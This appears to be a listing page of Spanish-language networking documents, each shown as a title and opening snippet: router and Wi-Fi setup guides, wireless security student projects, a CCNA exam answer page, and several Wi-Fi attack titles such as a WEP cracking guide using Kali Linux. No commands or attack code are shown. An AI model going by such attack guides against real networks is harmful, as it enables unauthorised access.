Guía de configuración de Wi-Fi Guía de configuración de Wi-Fi N.º de modelo Serie SP 212/SP 213 Introducción Hay dos modos de conexión de redes LAN inalámbricas: el modo de infraestructura para conectarse a través de un punto de acceso

Más detalles

Procedimiento de configuración básica del Router Wireless Broadband Router para el servicio AVIPLUS (Iberbanda) Modelo: WR514R2

Procedimiento de configuración básica del Router Wireless Broadband Router para el servicio AVIPLUS (Iberbanda) Modelo: WR514R2 Procedimiento de configuración básica del Router Wireless Broadband Router para el servicio AVIPLUS (Iberbanda) Modelo: WR514R2 Índice 1 Introducción...3 2 Antes de empezar...4 2.1 Datos de configuración...4

Más detalles

Principios básicos de las redes propias Nokia N93i-1

Principios básicos de las redes propias Nokia N93i-1 l Principios básicos de las redes propias Nokia N93i-1 Principios básicos de las redes propias 2ª edición ES, 9200197 Introducción Con la arquitectura UPnP y una red de área local inalámbrica (WLAN), es

Más detalles

WIFI MODO MASTER FLISOL 2009 RENZO ALBERTO TACO COAYLA. e-mail: renzo@itsperu.com http://www.itsperu.com blog: http://www.oxaseis.

WIFI MODO MASTER FLISOL 2009 RENZO ALBERTO TACO COAYLA. e-mail: renzo@itsperu.com http://www.itsperu.com blog: http://www.oxaseis. WIFI MODO MASTER FLISOL 2009 RENZO ALBERTO TACO COAYLA e-mail: renzo@itsperu.com url: http://www.itsperu.com blog: http://www.oxaseis.tk CONSULTORIA EMPRESARIAL EN TI Agenda Redes WIFI. Tipos de Nodos

Más detalles

Recomendaciones para la instalación de un sistema WIFI

Recomendaciones para la instalación de un sistema WIFI Recomendaciones para la instalación de un sistema WIFI La Dirección de Servicios Tecnologías de Información (STI) ha evaluado el sistema WIFI y esta liberando aplicaciones inalámbricas en las redes de

Más detalles

Wardriving Perú: Riesgos Ocultos. Jimmy Arthur Villanueva Llerena Especialista en redes y comunicaciones de datos

Wardriving Perú: Riesgos Ocultos. Jimmy Arthur Villanueva Llerena Especialista en redes y comunicaciones de datos Wardriving Perú: Riesgos Ocultos Jimmy Arthur Villanueva Llerena Especialista en redes y comunicaciones de datos Introducción La irrupción de la nueva tecnología basada en redes inalámbricas ha proporcionado

Más detalles

GUÍA DE CONFIGURACIÓN EN MODO PUNTO DE ACCESO PARA LA C150RUSM Y LA C300RU v3.0

GUÍA DE CONFIGURACIÓN EN MODO PUNTO DE ACCESO PARA LA C150RUSM Y LA C300RU v3.0 GUÍA DE CONFIGURACIÓN EN MODO PUNTO DE ACCESO PARA LA C150RUSM Y LA C300RU v3.0 Los modelos C150RUSM y C300RU v3.0 son posibles de configurar en modo punto de acceso. Este modo le permitirá convertir su

Más detalles

LABORATORIO FUNDAMENTOS DE REDES PERIODO AGOSTO-DICIEMBRE 2007

LABORATORIO FUNDAMENTOS DE REDES PERIODO AGOSTO-DICIEMBRE 2007 LABORATORIO FUNDAMENTOS DE REDES PERIODO AGOSTO-DICIEMBRE 2007 Práctica No. 2 Tema: Tiempo de la práctica: Elementos requeridos: WLAN 2 horas Punto de acceso inalámbrico, patch cord conexión directa, tarjetas

Más detalles

Configuración básica del Router WIFI WGRWAN 54M para el servicio AVIPLUS (Iberbanda) Modelo: WGRWAN 54M

Configuración básica del Router WIFI WGRWAN 54M para el servicio AVIPLUS (Iberbanda) Modelo: WGRWAN 54M Configuración básica del Router WIFI WGRWAN 54M para el servicio AVIPLUS (Iberbanda) Modelo: WGRWAN 54M Índice Índice...2 1 Introducción...3 2 Antes de empezar...4 2.1 Datos de configuración...4 2.2 Conexiones...4

Más detalles

CENTRO DE INVESTIGACIÓN Y DE ESTUDIOS AVANZADOS DEL IPN

CENTRO DE INVESTIGACIÓN Y DE ESTUDIOS AVANZADOS DEL IPN CENTRO DE INVESTIGACIÓN Y DE ESTUDIOS AVANZADOS DEL IPN Guía de configuración para establecer una conexión a la red icinvestav con el Sistema Operativo Windows Vista. En este documento se describen los

Más detalles

CCNA 3 EXAMEN 7 SU PUNTUACION ES 100%. RESPUESTAS CORRECTAS AL PRIMER INTENTO: 21/21 EJERCICIO COMPLETADO

CCNA 3 EXAMEN 7 SU PUNTUACION ES 100%. RESPUESTAS CORRECTAS AL PRIMER INTENTO: 21/21 EJERCICIO COMPLETADO CCNA 3 EXAMEN 7 SU PUNTUACION ES 100%. RESPUESTAS CORRECTAS AL PRIMER INTENTO: 21/21 EJERCICIO COMPLETADO Ver las preguntas una a una 1. 1.- Cuáles son las dos condiciones que favorecieron la adopción

Más detalles

Proyecto 2: Seguridad de Redes Inalámbricas

Proyecto 2: Seguridad de Redes Inalámbricas Proyecto 2: Seguridad de Redes Inalámbricas Alumnos: JUAN MIGUEL LÓPEZ RUBIO ROCÍO DOMÍNGUEZ RODRÍGUEZ RUBÉN BENÍTEZ TIRADO Fecha de entrega: Grupo: 21 Proyecto: 2 Modulo: Redes 1 Índice de contenido 1

Más detalles

CONFIGURACIÓN WINDOWS VISTA

CONFIGURACIÓN WINDOWS VISTA CONFIGURACIÓN DE REDES INALÁMBRICAS Para conectar un adaptador inalámbrico a un punto de acceso mediante la funcionalidad de gestión de Windows Vista se debe acceder en primer lugar al apartado Conectar

Más detalles

índice INTRODUCCIÓN...15

índice INTRODUCCIÓN...15 índice INTRODUCCIÓN...15 capítulo 1. hackers y seguridad...19 1.1 amenazas informáticas...20 1.1.1 Ataques activos...21 1.1.2 Ataques pasivos...22 1.2 hackers...23 1.2.1 Habilidades básicas...24 1.3 autoevaluación

Más detalles

1.- Información general...2 2.- Instalación y configuración del software necesario...3. 3.- Configuración del cliente de red inalámbrico...

1.- Información general...2 2.- Instalación y configuración del software necesario...3. 3.- Configuración del cliente de red inalámbrico... CONFIGURACIÓN DE PDAs PARA LA CONEXIÓN A LA RED INALÁMBRICA DE LA UAL 1.- Información general....2 2.- Instalación y configuración del software necesario...3 2.1 Instalar el cliente SecureW2... 3 2.2 Configuración

Más detalles

Ampliando el arsenal de ataque Wi-Fi. www.layakk.com @layakk

Ampliando el arsenal de ataque Wi-Fi. www.layakk.com @layakk Ampliando el arsenal de ataque Wi-Fi www.layakk.com @layakk David Pérez José Picó david.perez@layakk.com jose.pico@layakk.com Agenda Introducción Herramientas lk_wiclitatoo.py lk_wifi_device_finder.py

Más detalles

Redes WAN VPN. Esteban De La Fuente Rubio esteban@delaf.cl L A TEX. 13 may 2011. Universidad Andrés Bello

Redes WAN VPN. Esteban De La Fuente Rubio esteban@delaf.cl L A TEX. 13 may 2011. Universidad Andrés Bello VPN esteban@delaf.cl L A TEX Universidad Andrés Bello 13 may 2011 Tabla de contenidos 1 2 Tipos de VPN Funcionamiento 3 IPSec OpenVPN Empleados de forma remota. Disponer de trabajadores en sucursales.

Más detalles

Proyecto: Seguridad en Redes Wifi

Proyecto: Seguridad en Redes Wifi Redes de Computadores Proyecto: Seguridad en Redes Wifi Alumnos: - Gonzalo Vera Portilla - Cristian Wiche Latorre - Pedro Zepeda Pozo Profesor: Agustín González Redes de Computadores 1 Índice 1. Introducción

Más detalles

Guia para ataque WEP con cliente conectado desde Kali Linux Autores: Miguel Andrés Morcillo Carlos Andrés Burbano Carlos Eduardo Orozco

Guia para ataque WEP con cliente conectado desde Kali Linux Autores: Miguel Andrés Morcillo Carlos Andrés Burbano Carlos Eduardo Orozco Guia para ataque WEP con cliente conectado desde Kali Linux Autores: Miguel Andrés Morcillo Carlos Andrés Burbano Carlos Eduardo Orozco Nota: Entrar a http://aircrack-ng.org para soporte de compatibilidad

Más detalles

1. Instala servicios de configuración dinámica, describiendo sus características y aplicaciones.

1. Instala servicios de configuración dinámica, describiendo sus características y aplicaciones. Módulo Profesional: Servicios en Red. Código: 0227. Resultados de aprendizaje y criterios de evaluación. 1. Instala servicios de configuración dinámica, describiendo sus características y aplicaciones.

Más detalles

En primer lugar conectamos un cable Ethernet desde un equipo a un router. Ponemos el equipo en la misma red y como puerta de enlace.

En primer lugar conectamos un cable Ethernet desde un equipo a un router. Ponemos el equipo en la misma red y como puerta de enlace. a) REDES INALÁMBRICAS: WPA Personal - Configurar router inalámbrico Linksys WRT54GL en modo seguro: (Cambia el SSID por defecto y desactivar el broadcasting SSID, deshabilitar DHCP, cambiar nombre de usuario

Más detalles

IEEE 802.11: Seguridad

IEEE 802.11: Seguridad IEEE 802.11: Seguridad Profesora Maria Elena Villapol mvillap@strix.ciens.ucv.ve Ataques sobre Redes WLAN Leonardo Uzcátegui (WALC2005) los clasifica de la siguiente forma: Espionaje (surveillance): No

Más detalles

ISEC Lab #5. Análisis de redes wireless

ISEC Lab #5. Análisis de redes wireless Análisis de redes wireless Parte 1 Herramientas y técnicas de ataque Vicente Aguilera Díaz vaguileraisecauditors.com 1 INTRODUCCIÓN 3 2 ATAQUES A LOS SISTEMAS BÁSICOS DE PROTECCIÓN 4 2.1 OBTENCIÓN

Más detalles

Hacking ético y Seguridad en Red

Hacking ético y Seguridad en Red TFC: Administración de Redes y Sistemas Operativos Hacking ético y Seguridad en Red Alumno: Cristiano Dias Consultor: José Manuel Castillo Pedrosa 1 Índice Introducción... 3 Perfil del Hacker ético...

Más detalles

Repetir una señal wifi a larga distancia mediante Nanostation 2 y Tp-link wr340g

Repetir una señal wifi a larga distancia mediante Nanostation 2 y Tp-link wr340g Repetir una señal wifi a larga distancia mediante Nanostation 2 y Tp-link wr340g Boceto del Montaje; Inconvenientes; Al conectar una antena externa al ns2 pierde aproximadamente la mitad de su potencia.

Más detalles

Tenga en cuenta que esta es una configuración Básica pero efectiva, rápida y precisa para no tener nuestro Router con una señal abierta.

Tenga en cuenta que esta es una configuración Básica pero efectiva, rápida y precisa para no tener nuestro Router con una señal abierta. Configuración de Router Inalámbrico. 1 Configuración Básica de Un Router (Linksys WRT54G V8). A pesar de las imágenes que se mostraran sean de un Router Linksys WRT54G siguiendo los pasos se puede configurar

Más detalles

Configuración de la red WiFi de Sociales en Windows 7 y Vista... 2. Configuración de la red WiFi de Sociales en Windows XP... 9

Configuración de la red WiFi de Sociales en Windows 7 y Vista... 2. Configuración de la red WiFi de Sociales en Windows XP... 9 Índice Configuración de la red WiFi de Sociales en Windows 7 y Vista... 2 Configuración de la red WiFi de Sociales en Windows XP... 9 Configuración para Android (superior a 1.6)... 17 Configuración para

Más detalles

Configuración básica del Router: Barricade Wireless Broadband Router SMCWBR14S-N4 para el servicio AVIPLUS (Iberbanda)

Configuración básica del Router: Barricade Wireless Broadband Router SMCWBR14S-N4 para el servicio AVIPLUS (Iberbanda) Configuración básica del Router: Barricade Wireless Broadband Router SMCWBR14S-N4 para el servicio AVIPLUS (Iberbanda) 1 Índice 1 Introducción 2 Antes de empezar 2.1 Datos de configuración 2.2 Conexiones

Más detalles